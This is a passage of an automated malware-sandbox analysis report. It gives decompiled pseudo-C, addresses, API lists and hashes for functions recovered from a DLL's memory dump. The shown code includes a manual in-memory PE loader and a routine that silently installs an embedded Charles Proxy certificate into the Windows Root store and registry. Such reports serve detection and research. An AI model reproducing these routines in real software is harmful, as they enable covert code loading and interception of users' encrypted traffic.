							 *( *((intOrPtr*)(_t182 + 8)) + 0xc) =  *_t41 + 1;
							__eflags =  *( *(_t182 - 4));
							if( *( *(_t182 - 4)) == 0) {
								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
								_t106 =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
								__eflags = _t106;
								 *(_t182 - 0x14) = _t106;
							} else {
								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 4));
								 *(_t182 - 0x14) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
							}
							while(1) {
								L12:
								__eflags =  *( *(_t182 - 0x1c));
								if( *( *(_t182 - 0x1c)) == 0) {
									break;
								}
								L13:
								__eflags =  *( *(_t182 - 0x1c)) & 0x80000000;
								if(( *( *(_t182 - 0x1c)) & 0x80000000) == 0) {
									 *((intOrPtr*)(_t182 - 0x24)) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 0x1c));
									_t77 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
									_t114 =  *((intOrPtr*)(_t182 - 0x24)) + 2;
									__eflags = _t114;
									_t81 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
									_t116 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t182 - 0x20)), _t114,  *_t77);
									_t187 = _t187 + 0xc;
									 *( *(_t182 - 0x14)) = _t116;
								} else {
									_t67 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
									_t71 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
									_t121 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t182 - 0x20)),  *( *(_t182 - 0x1c)) & 0x0000ffff,  *_t67);
									_t187 = _t187 + 0xc;
									 *( *(_t182 - 0x14)) = _t121;
								}
								L16:
								__eflags =  *( *(_t182 - 0x14));
								if( *( *(_t182 - 0x14)) != 0) {
									L18:
									L11:
									 *(_t182 - 0x1c) =  &(( *(_t182 - 0x1c))[1]);
									_t173 =  *(_t182 - 0x14) + 4;
									__eflags = _t173;
									 *(_t182 - 0x14) = _t173;
									continue;
								} else {
									L17:
									 *(_t182 - 0xc) = 0;
								}
								break;
							}
							L19:
							__eflags =  *(_t182 - 0xc);
							if(__eflags != 0) {
								L21:
								continue;
							} else {
								L20:
								_t87 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
								_t90 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t182 - 0x20)),  *_t87);
								SetLastError(0x7f);
							}
						} else {
							L6:
							_t25 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
							_t28 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t182 - 0x20)),  *_t25);
							SetLastError(0xe);
							 *(_t182 - 0xc) = 0;
						}
					} else {
						L4:
						SetLastError(0x7e);
						 *(_t182 - 0xc) = 0;
					}
					break;
				}
				L22:
				_t93 =  *(_t182 - 0xc);
				return _t93;
			}

0x1001aba3
0x1001aba3
0x1001aba3
0x1001aba9
0x1001abba
0x00000000
0x00000000
0x1001abcd
0x1001abd0
0x1001abe1
0x1001abe4
0x1001abe6
0x1001abe9
0x1001abf0
0x1001ac06
0x1001ac09
0x1001ac13
0x1001ac17
0x1001ac1a
0x1001ac1b
0x1001ac20
0x1001ac23
0x1001ac26
0x1001ac2a
0x1001ac56
0x1001ac5c
0x1001ac62
0x1001ac68
0x1001ac6e
0x1001ac74
0x1001ac7d
0x1001ac83
0x1001ac86
0x1001acaa
0x1001acb3
0x1001acb3
0x1001acb6
0x1001ac88
0x1001ac90
0x1001ac9c
0x1001ac9c
0x1001accd
0x1001accd
0x1001acd0
0x1001acd3
0x00000000
0x00000000
0x1001acd5
0x1001acda
0x1001ace0
0x1001ad12
0x1001ad18
0x1001ad1f
0x1001ad1f
0x1001ad2a
0x1001ad2d
0x1001ad2f
0x1001ad35
0x1001ace2
0x1001ace5
0x1001acfb
0x1001acfe
0x1001ad00
0x1001ad06
0x1001ad06
0x1001ad37
0x1001ad3a
0x1001ad3d
0x1001ad48
0x1001acbb
0x1001acc1
0x1001acc7
0x1001acc7
0x1001acca
0x00000000
0x1001ad3f
0x1001ad3f
0x1001ad3f
0x1001ad3f
0x00000000
0x1001ad3d
0x1001ad4d
0x1001ad4d
0x1001ad51
0x1001ad73
0x00000000
0x1001ad53
0x1001ad53
0x1001ad56
0x1001ad61
0x1001ad64
0x1001ad6b
0x1001ad6b
0x1001ac2c
0x1001ac2c
0x1001ac2f
0x1001ac3a
0x1001ac3d
0x1001ac44
0x1001ac4a
0x1001ac4a
0x1001abf2
0x1001abf2
0x1001abf4
0x1001abfa
0x1001abfa
0x00000000
0x1001abf0
0x1001ad78
0x1001ad78
0x1001ad7e

APIs

IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
SetLastError.KERNEL32(0000007E), ref: 1001ABF4
_realloc.LIBCMT ref: 1001AC1B
SetLastError.KERNEL32(0000000E), ref: 1001AC44

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorLast$Read_realloc
String ID:
API String ID: 252108943-0
Opcode ID: c384f3d36efca167a9077d51d7c2b1bb8180d2edbecdb5a4fc9a0d208bb5e22f
Instruction ID: fc8650bffc04b339d430b1508d1055308318352e03b6944bc6f0970fdcc69cd6
Opcode Fuzzy Hash: c384f3d36efca167a9077d51d7c2b1bb8180d2edbecdb5a4fc9a0d208bb5e22f
Instruction Fuzzy Hash: B501EF74A00208EFDB04CF94C985B9DB7B1FF49359F608198E90AAB350C378EA81DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001B300, Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E1001B300(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t95;
				void* _t100;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;

				_t141 = __esi;
				_t140 = __edi;
				_t100 = __ebx;
				_t2 = _a16 + 4; // 0xe90575c0
				_v20 =  *_t2;
				_t6 =  *_a16 + 0x14; // 0x2b34508b
				_t8 = ( *_t6 & 0x0000ffff) + 0x18; // 0x1001b95d
				_v24 =  *_a16 + _t8;
				_v8 = 0;
				while(1) {
					_t16 =  *_a16 + 6; // 0xe2e905
					if(_v8 >= ( *_t16 & 0x0000ffff)) {
						break;
					}
					if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
						_t44 = _v24 + 0x14; // 0x2b34508b
						_t46 = _v24 + 0x10; // 0xb04d8b02
						_t78 = E1001AE40(_a8,  *_t44 +  *_t46);
						_t143 = _t142 + 8;
						if(_t78 != 0) {
							_t49 = _a16 + 0x34; // 0x8b0aeb18
							_t51 = _v24 + 0x10; // 0xb04d8b02
							_t54 = _v24 + 0xc; // 0x8bb8558b
							_t56 = _a16 + 0x1c; // 0x8b1874b4, executed
							_t82 =  *((intOrPtr*)( *_t56))(_v20 +  *_t54,  *_t51, 0x1000, 4,  *_t49); // executed
							_t144 = _t143 + 0x14;
							_v12 = _t82;
							if(_v12 != 0) {
								_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
								E1000D190(_t100, _t140, _t141, _v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *((intOrPtr*)(_v24 + 0x10)));
								_t142 = _t144 + 0xc;
								 *((intOrPtr*)(_v24 + 8)) = _v12;
								L1:
								_v8 = _v8 + 1;
								_v24 = _v24 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v16 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v16 <= 0) {
						L8:
						goto L1;
					}
					_t25 = _a16 + 0x34; // 0x8b0aeb18
					_t29 = _v24 + 0xc; // 0x8bb8558b
					_t31 = _a16 + 0x1c; // 0x8b1874b4
					_t95 =  *((intOrPtr*)( *_t31))(_v20 +  *_t29, _v16, 0x1000, 4,  *_t25);
					_t145 = _t142 + 0x14;
					_v12 = _t95;
					if(_v12 != 0) {
						_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
						 *((intOrPtr*)(_v24 + 8)) = _v12;
						E1000CF20(_t140, _v12, 0, _v16);
						_t142 = _t145 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}

0x1001b300
0x1001b300
0x1001b300
0x1001b309
0x1001b30c
0x1001b319
0x1001b31d
0x1001b321
0x1001b324
0x1001b33f
0x1001b344
0x1001b34b
0x00000000
0x00000000
0x1001b358
0x1001b3cf
0x1001b3d5
0x1001b3dd
0x1001b3e2
0x1001b3e7
0x1001b3f0
0x1001b3fe
0x1001b408
0x1001b40f
0x1001b412
0x1001b414
0x1001b417
0x1001b41e
0x1001b42d
0x1001b445
0x1001b44a
0x1001b453
0x1001b32d
0x1001b333
0x1001b33c
0x00000000
0x1001b33c
0x00000000
0x1001b420
0x00000000
0x1001b3e9
0x1001b360
0x1001b367
0x1001b3c7
0x00000000
0x1001b3c7
0x1001b36c
0x1001b381
0x1001b388
0x1001b38b
0x1001b38d
0x1001b390
0x1001b397
0x1001b3a9
0x1001b3b2
0x1001b3bf
0x1001b3c4
0x00000000
0x1001b3c4
0x00000000
0x1001b399
0x00000000

APIs

_memset.LIBCMT ref: 1001B3BF

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 0e4b15c6f8be2774af6517acaf1e6a5dc7f042fe7413adddbf46ab36f13a78d9
Instruction ID: a005275a1ccb32e2261c4421282f910c29d49b3246cd882dcb7603a91dee7caf
Opcode Fuzzy Hash: 0e4b15c6f8be2774af6517acaf1e6a5dc7f042fe7413adddbf46ab36f13a78d9
Instruction Fuzzy Hash: 7951A7B4A0010ADFCB04DF94D991EAEB7B5FF48304F248599E915AB346D730EE91CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001AAF0, Relevance: 1.5, APIs: 1, Instructions: 15
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001AAF0(void* __ecx, CHAR* _a4) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _t6;

				_t6 = LoadLibraryA(_a4); // executed
				_v8 = _t6;
				if(_v8 != 0) {
					return _v8;
				}
				return 0;
			}

0x1001aaf8
0x1001aafe
0x1001ab05
0x00000000
0x1001ab0b
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 1001AAF8

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c04995fa923df692f8169a9dfa8ba67c198ed432f40ad320a19afe33b55cab92
Instruction ID: 175513b2d3b99921c95d5b3868ca5ca2b884793c4c363252687910afe3f21655
Opcode Fuzzy Hash: c04995fa923df692f8169a9dfa8ba67c198ed432f40ad320a19afe33b55cab92
Instruction Fuzzy Hash: 4CD0927490924CEBCB10DFA4DA88A8EB7F8EB09251F208595FC0997201D631DE809AA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001AAC0, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001AAC0(struct HINSTANCE__* _a4) {
				int _t3;

				_t3 = FreeLibrary(_a4); // executed
				return _t3;
			}

0x1001aac7
0x1001aace

APIs

FreeLibrary.KERNEL32(?), ref: 1001AAC7

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 943a5e761fb49f706bd806fa478419eb7e3c1528e20f65d3e9a3f78506bcc702
Instruction ID: d41d78d4d80a0482e50fbcd51c543f3b4bec57f301915c91e4edb7b1fe7fc2cd
Opcode Fuzzy Hash: 943a5e761fb49f706bd806fa478419eb7e3c1528e20f65d3e9a3f78506bcc702
Instruction Fuzzy Hash: E3B0123100030CBBCE005BD8E8888C53B9C96085117004000F60C83100C630F44046E4

Uniqueness

Uniqueness Score: -1.00%

Function 1000EBD1, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000EBD1(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;
				void* _t13;

				E10015254();
				_push(_a4);
				_t5 = L1000EAD4(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
				return _t5;
			}

0x1000ebd1
0x1000ebd6
0x1000ebe2
0x1000ebe8

APIs

___security_init_cookie.LIBCMT ref: 1000EBD1

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
Instruction ID: df3c7268351b8d96a0cbb6988288c15aabcc851e0dc57428b4f822f300cb22e6
Opcode Fuzzy Hash: 435c711d617b55a71fb4d1b54f090de3e7e2be7afa2c94b8a1ac53afd156608b
Instruction Fuzzy Hash: 9DB0483A208280AB9204CA10D84180EB3A2EBD9211F24C91DF4A61AA558B31AC64EA52

Uniqueness

Uniqueness Score: -1.00%

Function 10004520, Relevance: 1.4, APIs: 1, Instructions: 120
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E10004520(void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed char* _v56;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				char* _v148;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				char _v188;
				char _v192;
				intOrPtr _v196;
				char _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t55;
				void* _t63;
				void* _t70;
				void* _t73;
				intOrPtr* _t76;
				intOrPtr _t86;
				intOrPtr _t96;
				void* _t97;
				void* _t100;
				void* _t102;

				_t102 = __eflags;
				_t55 = _a4;
				_t96 = _a8;
				_v184 = E10004490;
				_v180 = E100044C0;
				_v176 = _t55;
				_v172 = _t55;
				_v168 = _t96;
				_t97 = 0;
				E100071F0();
				_v216 = E100046C0;
				_v212 = E100046E0;
				_v200 = E100046C0;
				_v196 = E100046E0;
				E10007530( &_v164, 0);
				_v136 = 0;
				_v136 = _v216( &_v216, _t96);
				_v132 = _t96;
				_v148 =  &_v184;
				_v140 = 0;
				_v144 = 0;
				E100048A0(_t102,  &_v128);
				_t63 = E10006FD0(__ebp, _t102,  &_v128,  &_v164,  &_v216,  &_v200);
				_t100 =  &_v220 + 0x24;
				if(_t63 == 0) {
					_v204 = 0xffffffff;
					_v208 = 0;
					_v220 = 0;
					_v192 = 0;
					_v188 = 0;
					if(( *_v56 & 0x00000080) == 0) {
						_t70 = E10007010( &_v128,  &_v164, 0,  &_v204,  &_v208,  &_v220,  &_v192,  &_v188,  &_v216,  &_v200);
						_t100 = _t100 + 0x28;
						if(_t70 == 0) {
							_t73 = VirtualAlloc(0, _v220 + 1, 0x3000, 4); // executed
							_t97 = _t73;
							if(_t97 != 0) {
								_t76 = _a12;
								_t107 = _t76;
								_t86 = _v220;
								if(_t76 != 0) {
									 *_t76 = _t86;
								}
								E1000D190(0, _t96, _t97, _t97, _v208, _t86);
								_t100 = _t100 + 0xc;
								 *((char*)(_v220 + _t97)) = 0;
							}
							_v212( &_v216, _v208);
							_t100 = _t100 + 8;
						}
					}
				}
				E100048E0(_t107,  &_v128,  &_v216);
				return _t97;
			}

0x10004520
0x10004526
0x10004530
0x10004537
0x1000453f
0x10004547
0x1000454b
0x1000454f
0x10004555
0x10004557
0x10004562
0x1000456a
0x10004572
0x1000457a
0x10004582
0x1000458d
0x10004595
0x100045a2
0x100045a6
0x100045aa
0x100045ae
0x100045b2
0x100045ce
0x100045d3
0x100045d8
0x100045e5
0x100045ed
0x100045f1
0x100045f5
0x100045f9
0x10004600
0x10004637
0x1000463c
0x10004641
0x10004653
0x10004659
0x1000465d
0x1000465f
0x10004666
0x10004668
0x1000466c
0x1000466e
0x1000466e
0x10004677
0x10004680
0x10004683
0x10004683
0x10004690
0x10004694
0x10004694
0x10004641
0x10004600
0x100046a1
0x100046b4

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10004653

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c2d35d8754308452533e96aa7c000d4ad4c917207e26cfb6ac4e1330ab019eeb
Instruction ID: 5f3268faf400ee4384dde952e7e6cf138bea3fab27ca3dfaa28aee59be70a859
Opcode Fuzzy Hash: c2d35d8754308452533e96aa7c000d4ad4c917207e26cfb6ac4e1330ab019eeb
Instruction Fuzzy Hash: BB4119B6408341AFD310CF55D88099BBBE8FBC8294F404E1EF59983255EB71E909CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 1001AB20, Relevance: 1.3, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001AB20(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}

0x1001ab2f
0x1001ab36

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 1001AB2F

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: efa2235f1a2847ed0b6446073af2640c43a9e9fd204ca04507465df4fdaa2711
Instruction ID: c3865ccbcae920e215e079fb98926607579ac42653a45aa6abdb7f6c5b589da4
Opcode Fuzzy Hash: efa2235f1a2847ed0b6446073af2640c43a9e9fd204ca04507465df4fdaa2711
Instruction Fuzzy Hash: F4C04C7621420CABCB04DF98DCD4CAB77ADAB8CB10B10C508FB1D87200C634F9118BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1001F720, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 177
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E1001F720(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				char* _v16;
				BYTE* _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				char _v299;
				char _v300;
				char _v563;
				char _v564;
				signed int _v568;
				void* __ebp;
				BYTE* _t66;
				int _t69;
				int _t70;
				int _t71;
				long _t72;
				int _t75;
				signed int _t90;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				void* _t127;

				_t119 = __esi;
				_t118 = __edi;
				_t91 = __ebx;
				_v16 = "-----BEGIN CERTIFICATE-----\nMIIFTDCCBDSgAwIBAgIGAW3jTP9iMA0GCSqGSIb3DQEBCwUAMIGqMTswOQYDVQQD\nDDJDaGFybGVzIFByb3h5IENBICgxOSDljYHmnIggMjAxOSwgREVTS1RPUC1CTkFU\nMTFVKTElMCMGA1UECwwcaHR0cHM6Ly9jaGFybGVzcHJveHkuY29tL3NzbDERMA8G\nA1UECgwIWEs3MiBMdGQxETAPBgNVBAcMCEF1Y2tsYW5kMREwDwYDVQQIDAhBdWNr\nbGFuZDELMAkGA1UEBhMCTlowHhcNMDAwMTAxMDAwMDAwWhcNNDgxMjE1MDkxNTM3\nWjCBqjE7MDkGA1UEAwwyQ2hhcmxlcyBQcm94eSBDQSAoMTkg5Y2B5pyIIDIwMTks\nIERFU0tUT1AtQk5BVDExVSkxJTAjBgNVBAsMHGh0dHBzOi8vY2hhcmxlc3Byb3h5\nLmNvbS9zc2wxETAPBgNVBAoMCFhLNzIgTHRkMREwDwYDVQQHDAhBdWNrbGFuZDER\nMA8GA1UECAwIQXVja2xhbmQxCzAJBgNVBAYTAk5aMIIBIjANBgkqhkiG9w0BAQEF\nAAOCAQ8AMIIBCgKCAQEArobFBD7TTZn0T6MFLqNAR6f7vjMYix3CymRcoySeheVL\nSSHUmY/aaiIkfDLZCH10KvO/hQgDroweJfqtU/uP2CO3NT2aOsmSv5F/aTgmx5Dl\nOlQLEgtlU1COyVheRn0xC9Pvn7YXMd61Iut49D+CSzS+Nngtt6jLFizSIkexTkxa\n5jPtZlQjVKWZcb3cWRYOzcUhtEd8k8qeYk4K8AKYYCMA9dw2iBnDy58CYEY2iIJ2\ns6SYVwRztTKLCDTzJ8NCheMz2pIH4S8O27ZUyM8R48x8uhelLNfNQsEK4JWi5Oud\nPj82FIgkPwWEr0DnLW5uGCFJv7g0I4T2DxLhRzQljQIDAQABo4IBdDCCAXAwDwYD\nVR0TAQH/BAUwAwEB/zCCASwGCWCGSAGG+EIBDQSCAR0TggEZVGhpcyBSb290IGNl\ncnRpZmljYXRlIHdhcyBnZW5lcmF0ZWQgYnkgQ2hhcmxlcyBQcm94eSBmb3IgU1NM\nIFByb3h5aW5nLiBJZiB0aGlzIGNlcnRpZmljYXRlIGlzIHBhcnQgb2YgYSBjZXJ0\naWZpY2F0ZSBjaGFpbiwgdGhpcyBtZWFucyB0aGF0IHlvdSdyZSBicm93c2luZyB0\naHJvdWdoIENoYXJsZXMgUHJveHkgd2l0aCBTU0wgUHJveHlpbmcgZW5hYmxlZCBm\nb3IgdGhpcyB3ZWJzaXRlLiBQbGVhc2Ugc2VlIGh0dHA6Ly9jaGFybGVzcHJveHku\nY29tL3NzbCBmb3IgbW9yZSBpbmZvcm1hdGlvbi4wDgYDVR0PAQH/BAQDAgIEMB0G\nA1UdDgQWBBT40NxUNnz3lAIPi5J4Ol2KkSUfnzANBgkqhkiG9w0BAQsFAAOCAQEA\nZiJx651cdEyIOC3pi6NzIOYxIQTQQnOpIAeoZwl21lMOY0fQC73tExm7Z1TzYjdZ\nYJWSKRHjZhpwNU9roLeXp2JYvnreu4yNvu7Zd3YLgCcddLJETZL2wTN6N5tzVFsl\nHeX4gSuWJau7+u3BX4xsN0ubJt0P7wNRhfWJnYgZ5oncbbXwurv9Y3xSsb7IARW4\nifru1JPUES10SVStOr5mB8QaSi1le6Mw7RMfpOjCW7KO4YHc742pHBe/0wojyOro\nGxUu2F/5OK/DKzT/2v+9ty2bsEBnv8h/V566ljexZeoAjqdAi8gmXzPAOb9g9QbS\nRaa1MBevyOFh1w7VsNdldg==\n-----END CERTIFICATE-----\n";
				_v24 = 0;
				_v8 = 0;
				_v28 = 0;
				_v12 = 0;
				if(CryptStringToBinaryA(_v16, 0, 0, 0,  &_v12, 0, 0) != 0 && _v12 > 0) {
					_t66 = L1000CE56(__ebx, _v12, __edi, __esi, _v12);
					_t122 = _t121 + 4;
					_v20 = _t66;
					_t133 = _v20;
					if(_v20 != 0) {
						CryptStringToBinaryA(_v16, 0, 0, _v20,  &_v12, 0, 0);
						_t69 = _v12;
						__imp__CertCreateCertificateContext(1, _v20, _t69);
						_v8 = _t69;
						_push(_v20);
						_t70 = E1000CA30(__ebx, __edi, __esi, _t133);
						_t123 = _t122 + 4;
						if(_v8 != 0) {
							__imp__CertOpenStore(0xa, 0, 0, 0x24000, L"Root");
							_v28 = _t70;
							if(_v28 != 0) {
								_t71 = _v8;
								__imp__CertAddCertificateContextToStore(_v28, _t71, 1, 0);
								if(_t71 == 0) {
									_t72 = GetLastError();
									__eflags = _t72 - 0x80092005;
									if(_t72 == 0x80092005) {
										_v36 = 0;
										_v32 = 0;
										__imp__CertGetCertificateContextProperty(_v8, 3, 0,  &_v36);
										__eflags = _v36;
										if(_v36 > 0) {
											_t75 = L1000CE56(__ebx,  &_v36, __edi, __esi, _v36 + 1);
											_t124 = _t123 + 4;
											_v32 = _t75;
											__eflags = _v32;
											if(_v32 != 0) {
												E1000CF20(_t118, _v32, 0, _v36 + 1);
												__imp__CertGetCertificateContextProperty(_v8, 3, _v32,  &_v36);
												_v564 = 0;
												E1000CF20(_t118,  &_v563, 0, 0x103);
												_v300 = 0;
												E1000CF20(_t118,  &_v299, 0, 0x103);
												_t127 = _t124 + 0x24;
												_v568 = 0;
												while(1) {
													__eflags = _v568 - _v36;
													if(_v568 >= _v36) {
														break;
													}
													E1000CC93(_t118, _t120 + _v568 * 2 - 0x128, "%02X",  *(_v32 + _v568) & 0x000000ff);
													_t127 = _t127 + 0xc;
													_t90 = _v568 + 1;
													__eflags = _t90;
													_v568 = _t90;
												}
												E1000CC93(_t118,  &_v564, "Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\%s",  &_v300);
												_v24 = E1001F680(_a8, __eflags, 0x80000002,  &_v564, _a4, _a8);
												_push(_v32);
												E1000CA30(_t91, _t118, _t119, __eflags);
											}
										}
									}
								} else {
									_v24 = 1;
								}
								__imp__CertCloseStore(_v28, 1);
							}
							__imp__CertFreeCertificateContext(_v8);
						}
					}
				}
				return _v24;
			}

0x1001f720
0x1001f720
0x1001f720
0x1001f729
0x1001f730
0x1001f737
0x1001f73e
0x1001f745
0x1001f766
0x1001f77a
0x1001f77f
0x1001f782
0x1001f785
0x1001f789
0x1001f7a3
0x1001f7a9
0x1001f7b3
0x1001f7b9
0x1001f7bf
0x1001f7c0
0x1001f7c5
0x1001f7cc
0x1001f7e2
0x1001f7e8
0x1001f7ef
0x1001f7f9
0x1001f801
0x1001f809
0x1001f817
0x1001f81d
0x1001f822
0x1001f828
0x1001f82f
0x1001f842
0x1001f848
0x1001f84c
0x1001f859
0x1001f85e
0x1001f861
0x1001f864
0x1001f868
0x1001f87b
0x1001f891
0x1001f897
0x1001f8ac
0x1001f8b4
0x1001f8c9
0x1001f8ce
0x1001f8d1
0x1001f8ec
0x1001f8f2
0x1001f8f5
0x00000000
0x00000000
0x1001f91c
0x1001f921
0x1001f8e3
0x1001f8e3
0x1001f8e6
0x1001f8e6
0x1001f939
0x1001f95d
0x1001f963
0x1001f964
0x1001f969
0x1001f868
0x1001f84c
0x1001f80b
0x1001f80b
0x1001f80b
0x1001f972
0x1001f972
0x1001f97c
0x1001f97c
